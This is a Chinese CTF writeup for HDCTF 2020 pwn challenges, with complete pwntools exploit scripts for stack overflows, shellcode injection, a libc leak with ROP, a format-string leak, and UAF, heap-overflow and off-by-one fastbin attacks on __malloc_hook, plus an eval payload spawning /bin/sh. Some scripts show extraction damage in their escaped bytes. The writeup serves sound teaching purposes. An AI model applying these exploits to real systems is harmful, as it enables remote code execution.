• HDCTF 2020 Writeup


    国庆在家摸鱼,听到同学说有这个海南大学举办的比赛,于是就来随便玩了玩 摸鱼日记
    总体难度并不大,pwn题的考点都比较基础和常规,可以作为一个基础知识的回顾与熟悉

    Writeup

    pwn

    calculator

    漏洞点:使用了python2中的input函数(它会对输入内容做eval),导致了任意代码执行

    payload:

    # Evaluated by the challenge's Python 2 input() call, which behaves like
    # eval(raw_input()), so any expression the user types is executed.
    # Mitigation: read with raw_input() and parse with ast.literal_eval().
    __import__('os').system("/bin/sh")
    

    即可get shell

    warmup

    题目需要输入一个int型数据使得abs(v4)<0

    我们只需输入最小的整数即可get shell:输入 -2^31,即 -2147483648(abs(INT_MIN) 因溢出后仍为负数)

    backdoor

    简单的栈溢出,有后门,直接溢出到后门函数即可

    exp:

    from pwn import *
    # Challenge service from the writeup (competition target).
    p= remote('39.107.127.44',10002)
    p.recvuntil('name:')
    # Address of the backdoor (shell) function. A fixed 0x4... address, so
    # the binary is presumably non-PIE -- verify against the ELF.
    backdoor = 0x400697
    # 0xA + 8 bytes of filler reach the saved return address (presumably a
    # 0xA-byte buffer plus the saved rbp -- confirm with the disassembly),
    # then the return address is replaced by backdoor. This only works
    # because nothing (e.g. a stack canary) detects the overwrite.
    payload = 'a'*0xA+'a'*8+p64(backdoor)
    p.send(payload)
    p.interactive()
    

    pwnme

    没有开NX,有RWX的段并且可以往bss段上写数据,在bss段上写入shellcode,然后栈溢出返回地址到shellcode处即可

    exp:

    from pwn import*
    p = remote('39.107.127.44',10006)
    #p=process('./pwnme')
    # NOTE(review): elf is assigned but never used below.
    elf=ELF('./pwnme')
    # amd64 target; log_level='debug' echoes every byte sent and received.
    context(os='linux',arch='amd64',log_level='debug')
    # Stage 1: the 'Name' input lands in a writable+executable .bss region
    # (NX disabled, per the writeup), so it can hold shellcode.
    shellcode = asm(shellcraft.sh())
    p.recvuntil('Name:')
    p.send(shellcode)
    # Stage 2: 40 bytes of filler reach the saved return address, which is
    # pointed at the .bss buffer (0x601080 -- presumably where 'Name' is
    # stored; verify against the binary). NX alone would block this.
    payload='a'*40+p64(0x601080)
    p.recvuntil('Try your best:')
    p.sendline(payload)
    p.interactive()
    

    babyrop

    通过puts泄露libc基址,然后rop打one_gadget

    exp:

    from pwn import*
    # NOTE(review): this local process is started and then immediately
    # shadowed by the remote() below, leaving a stray ./babyrop child.
    p = process('./babyrop')
    #ip = '39.107.127.44' 
    #port ='10001'
    p = remote('39.107.127.44',10001)
    elf = ELF('./babyrop')
    # The libc shipped with the challenge; used to resolve the leak.
    libc = ELF('./libc-2.23-64.so')
    # Return target after the leak, so the overflow can be triggered twice.
    main = 0x400617 
    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    # 'pop rdi; ret' gadget (fixed address: binary is presumably non-PIE).
    pop_rdi = 0x4006d3
    p.recvuntil('Your input :')
    # Round 1: 0x28 bytes of filler up to the return address, then
    # puts(puts@got) leaks the libc address of puts, then back to main.
    payload = 'a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
    p.send(payload)
    # puts prints the 6 significant bytes of the pointer; pad to 8 for u64.
    # NOTE(review): 'x00' looks like an extraction artifact (dropped
    # backslash); as written the padding is the literal characters x,0,0.
    puts_add = u64(p.recv(6).ljust(8,'x00'))
    libc_base = puts_add - libc.symbols['puts']
    log.info('puts:'+hex(puts_add))
    log.info('libc_base:'+hex(libc_base))
    # one_gadget offset for the supplied libc build (value from the writeup).
    one = libc_base + 0xf0364
    p.recvuntil('Your input :')
    # Round 2: same overflow, return address replaced by the one-gadget.
    payload = 'a'*0x28 + p64(one)
    p.sendline(payload)
    p.interactive()
    

    echo

    printf存在格式化字符串漏洞,flag被读到了栈上,利用格式化字符串将flag打印出来即可。

    经过调试,得到flag位于 %27$p 到 %37$p 的位置上

    每一项读出来十六进制转字符后逆序,最后全部拼接起来即可

    exp:

    from pwn import*
    p = remote('39.107.127.44',10004)
    # Accumulates the flag bytes recovered from the stack, one slot at a time.
    flag = ""
    def leak(index: int) -> str:
        """Read one stack slot through a '%<index>$p' format string.

        The service passes user input to printf (format-string bug), so
        '%N$p' prints the N-th argument slot as hex. The flag was read onto
        the stack beforehand (slots 27..37 per the writeup). Returns the low
        4 bytes of the slot in little-endian order, which already reverses
        the byte order of the printed hex. Uses the module-level connection p.
        """
        p.recvuntil('>')
        payload = '%'+str(index)+'$'+'p'
        p.sendline(payload)
        # NOTE(review): the recvuntil delimiter below appears garbled by
        # extraction (a newline escape split across two lines); [:-1] strips
        # that trailing delimiter before parsing the hex.
        answer = p.recvuntil('
    ')[:-1]
        b = int(answer,16)
        answer = p64(b)[:4]
        return answer 
    
    # Walk the slots the debugger showed holding the flag (27..37 inclusive).
    for i in range(27,38):
        flag += leak(i)
     
    # Python 2 print statement (the whole script is Python 2).
    print flag
    

    easyheap

    存在UAF漏洞,利用unsorted bin泄露libc基址,然后fastbin attack 打 mallochook

    exp:

    from pwn import *
    #p = process('./easyheap')
    p = remote('39.107.127.44',10003)
    # The libc shipped with the challenge; used to turn the leak into a base.
    libc = ELF('./libc-2.23.so')
    #context.log_level='debug'
    def add(id: int, size: int, content: str) -> None:
        """Menu option 1: allocate a chunk with the given id, size and contents.

        `content` is sent raw (no trailing newline). `id` shadows the builtin;
        kept as-is to match the callers. Uses the module-level connection p.
        """
        p.sendlineafter('Your choice :','1')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def edit(id: int, content: str) -> None:
        """Menu option 2: overwrite the contents of chunk `id`.

        Per the writeup the service does not reject a freed id, which is the
        use-after-free the main script relies on. Uses the module-level p.
        """
        p.sendlineafter('Your choice :','2')
        p.sendlineafter('id:',str(id))
        p.sendafter('content:',content)
    
    def delete(id: int) -> None:
        """Menu option 3: free chunk `id` (the pointer is presumably left
        dangling -- the root cause of the UAF). Uses the module-level p."""
        p.sendlineafter('Your choice :','3')
        p.sendlineafter('id:',str(id))
    
    def show(id: int) -> None:
        """Menu option 4: print the contents of chunk `id`; the caller reads
        the output from p itself. Works on freed ids too (UAF read)."""
        p.sendlineafter('Your choice :','4')
        p.sendlineafter('id:',str(id))
    
    # Root cause: delete() leaves a dangling pointer, so show/edit keep
    # working on a freed chunk. Defensive fix: NULL the slot on free and
    # reject ids that are not live.
    # Leak: chunk 0 goes to the unsorted bin (chunk 1 keeps it away from
    # top) and is then shown while freed; its fd points into main_arena.
    add(0,0x90,'aaaa')
    add(1,0x90,'bbbb')
    delete(0)
    #gdb.attach(p)
    show(0)
    p.recvline()
    # The unsorted-bin head sits at main_arena+88 in this glibc 2.23 build.
    # NOTE(review): 'x00' looks like an extraction artifact (dropped backslash).
    main_arena = u64(p.recv(6).ljust(8,'x00')) - 88
    # __malloc_hook lies 0x10 below main_arena in glibc 2.23.
    libc_base = main_arena-0x10-libc.sym['__malloc_hook']
    log.info('libc_base:%x',libc_base)
    malloc_hook=libc_base+libc.sym['__malloc_hook']
    # Fake-chunk address 0x23 below __malloc_hook (offset from the writeup).
    log.info('fake:0x%x',malloc_hook-0x23)
    # one_gadget offset for the supplied libc (value from the writeup).
    one = libc_base + 0x4527a
    # Fastbin attack: free chunk 2 and, through the same UAF, overwrite its
    # fd with the fake-chunk address.
    add(2,0x60,'cccc')
    add(3,0x60,'dddd')
    delete(2)
    edit(2,p64(malloc_hook-0x23))
    # The first allocation returns chunk 2; the second returns the fake
    # chunk, and 0x13 bytes of padding place the one-gadget on __malloc_hook.
    add(4,0x60,'eeee')
    add(5,0x60,'x00'*0x13+p64(one))
    #gdb.attach(p)
    # Any further malloc now calls the hook; the menu is driven by hand so
    # nothing is sent after the size prompt.
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(6))
    p.sendlineafter('size:',str(0x10))
    p.interactive()
    

    babyheap

    存在堆溢出漏洞,unsorted bin泄露地址,fastbin attack 打malloc hook

    exp:

    from pwn import *
    # NOTE(review): this local process is started and immediately shadowed
    # by the remote() below, leaving a stray ./babyheap child.
    p = process('./babyheap')
    p = remote('39.107.127.44',10000)
    # The libc shipped with the challenge; used to turn the leak into a base.
    libc = ELF('./libc-2.23.so')
    #context.log_level='debug'
    def add(id: int, size: int, content: str) -> None:
        """Menu option 1: allocate a chunk with the given id, size and contents.

        `content` is sent raw (no trailing newline). `id` shadows the builtin;
        kept as-is to match the callers. Uses the module-level connection p.
        """
        p.sendlineafter('Your choice :','1')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def edit(id: int, size: int, content: str) -> None:
        """Menu option 2: write `size` bytes of `content` into chunk `id`.

        The caller supplies the length and, per the writeup, the service does
        not bound it by the chunk's real size -- that is the heap overflow.
        Uses the module-level connection p.
        """
        p.sendlineafter('Your choice :','2')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def delete(id: int) -> None:
        """Menu option 3: free chunk `id`. Uses the module-level connection p."""
        p.sendlineafter('Your choice :','3')
        p.sendlineafter('id:',str(id))
    
    def show(id: int) -> None:
        """Menu option 4: print the contents of chunk `id`; the caller reads
        the output from p itself."""
        p.sendlineafter('Your choice :','4')
        p.sendlineafter('id:',str(id))
    # Leak: chunk 0 is freed into the unsorted bin, then chunk 2 is carved
    # out of it. The carved memory is not cleared, so showing it past the
    # 8 'c's reveals a leftover arena pointer.
    add(0,0x90,'aaaa')
    add(1,0x90,'bbbb')
    delete(0)
    #gdb.attach(p)
    add(2,0x50,'c'*8)
    #gdb.attach(p)
    show(2)
    p.recvuntil('c'*8)
    # 0x90 (0xc08 - 0xb78) and 88 were presumably measured in the debugger
    # as the distance from the leaked pointer to main_arena -- verify.
    # NOTE(review): 'x00' looks like an extraction artifact (dropped backslash).
    main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
    log.info('main_arena:%x',main_arena)
    #gdb.attach(p)
    # __malloc_hook lies 0x10 below main_arena in glibc 2.23.
    malloc_hook = main_arena - 0x10
    libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
    # one_gadget offset for the supplied libc (value from the writeup).
    one = libc_base + 0x4527a
    # Fake-chunk address 0x23 below __malloc_hook (offset from the writeup).
    log.info('fake:0x%x',malloc_hook-0x23)
    # Three adjacent 0x70 chunks; chunk 4 is freed into the fastbin.
    add(3,0x60,'dddd')
    add(4,0x60,'eeee')
    add(5,0x60,'ffff')
    delete(4)
    #gdb.attach(p)
    # Heap overflow: edit() accepts 0x80 bytes for a 0x60-byte chunk, so the
    # write runs past chunk 3 (0x68 bytes) into chunk 4's size (0x71) and
    # fd, which now points at the fake chunk. Bounding the edit length by
    # the allocation size would stop this.
    edit(3,0x80,'x00'*0x68+p64(0x71)+p64(malloc_hook-0x23))
    # First allocation returns chunk 4; the second returns the fake chunk,
    # and 0x13 bytes of padding place the one-gadget on __malloc_hook.
    add(6,0x60,'gggg')
    add(7,0x60,'x00'*0x13+p64(one))
    #gdb.attach(p)
    # Any further malloc now calls the hook; the menu is driven by hand so
    # nothing is sent after the size prompt.
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(8))
    p.sendlineafter('size:',str(0x10))
    p.interactive()
    

    hardheap

    edit函数存在off-by-one漏洞,溢出1字节,先通过unsorted bin泄露libc地址

    再通过off-by-one造成块堆叠,制造fastbin attack,打malloc hook

    exp:

    from pwn import *
    #p = process('./hardheap')
    p = remote('39.107.127.44',10005)
    # The libc shipped with the challenge; used to turn the leak into a base.
    libc = ELF('./libc-2.23.so')
    #context.log_level='debug'
    def add(id: int, size: int, content: str) -> None:
        """Menu option 1: allocate a chunk with the given id, size and contents.

        `content` is sent raw (no trailing newline). `id` shadows the builtin;
        kept as-is to match the callers. Uses the module-level connection p.
        """
        p.sendlineafter('Your choice :','1')
        p.sendlineafter('id:',str(id))
        p.sendlineafter('size:',str(size))
        p.sendafter('content:',content)
    
    def edit(id: int, content: str) -> None:
        """Menu option 2: overwrite the contents of chunk `id`.

        Per the writeup the service accepts one byte more than the chunk
        holds (off-by-one). Uses the module-level connection p.
        """
        p.sendlineafter('Your choice :','2')
        p.sendlineafter('id:',str(id))
        p.sendafter('content:',content)
    
    def delete(id: int) -> None:
        """Menu option 3: free chunk `id`. Uses the module-level connection p."""
        p.sendlineafter('Your choice :','3')
        p.sendlineafter('id:',str(id))
    def show(id: int) -> None:
        """Menu option 4: print the contents of chunk `id`; the caller reads
        the output from p itself."""
        p.sendlineafter('Your choice :','4')
        p.sendlineafter('id:',str(id))
    
    # Leak: chunk 0 is freed into the unsorted bin (chunk 1 keeps it away
    # from top), then chunk 2 is carved out of it; the uncleared bytes after
    # the 8 'c's still hold an arena pointer.
    add(0,0x90,'aaaa')
    add(1,0x18,'bbbb')
    delete(0)
    add(2,0x50,'c'*8)
    show(2)
    p.recvuntil('c'*8)
    # 0x90 (0xc08 - 0xb78) and 88 were presumably measured in the debugger
    # as the distance from the leaked pointer to main_arena -- verify.
    # NOTE(review): 'x00' looks like an extraction artifact (dropped backslash).
    main_arena = u64(p.recv(6).ljust(8,'x00')) - ( 0xc08 - 0xb78) -88
    log.info('main_arena:0x%x',main_arena)
    #gdb.attach(p)
    # __malloc_hook lies 0x10 below main_arena in glibc 2.23.
    malloc_hook = main_arena - 0x10
    libc_base = main_arena - 0x10 -libc.sym['__malloc_hook']
    # Fake-chunk address 0x23 below __malloc_hook (offset from the writeup).
    log.info('fake:0x%x',malloc_hook-0x23)
    # one_gadget offset for the supplied libc (value from the writeup).
    one = libc_base + 0x4527a
    # Lay out chunks 3..6; chunk 4 (0x20) presumably follows chunk 1 and is
    # followed by chunk 5 (0x70) -- confirm in the debugger.
    add(3,0x30,'dddd')
    add(4,0x18,'eeee')
    add(5,0x60,'ffff')
    add(6,0x18,'gggg')
    # Off-by-one: 0x18 bytes fill chunk 1 and the extra byte rewrites the
    # size field of the next chunk to 0x91, so it now spans chunk 4 and 5.
    # Rejecting writes beyond the allocation size would stop this.
    edit(1,'x00'*0x18+p8(0x91))
    # Free the enlarged chunk and re-allocate it as chunk 7, which overlaps
    # chunk 5 (the "chunk overlap" from the writeup).
    delete(4)
    add(7,0x80,'hhhh')
    # Chunk 5 goes into the 0x70 fastbin; through the overlap, chunk 7
    # rewrites its size (0x71) and fd to the fake-chunk address.
    delete(5)
    edit(7,'x00'*0x18+p64(0x71)+p64(malloc_hook-0x23))
    # First allocation returns chunk 5; the second returns the fake chunk,
    # and 0x13 bytes of padding place the one-gadget on __malloc_hook.
    add(8,0x60,'iiii')
    add(9,0x60,'x00'*0x13+p64(one))
    #gdb.attach(p)
    # Any further malloc now calls the hook; the menu is driven by hand so
    # nothing is sent after the size prompt.
    p.sendlineafter('Your choice :','1')
    p.sendlineafter('id:',str(10))
    p.sendlineafter('size:',str(0x10))
    p.interactive()
    
  • 原文地址:https://www.cnblogs.com/z2yh/p/13771942.html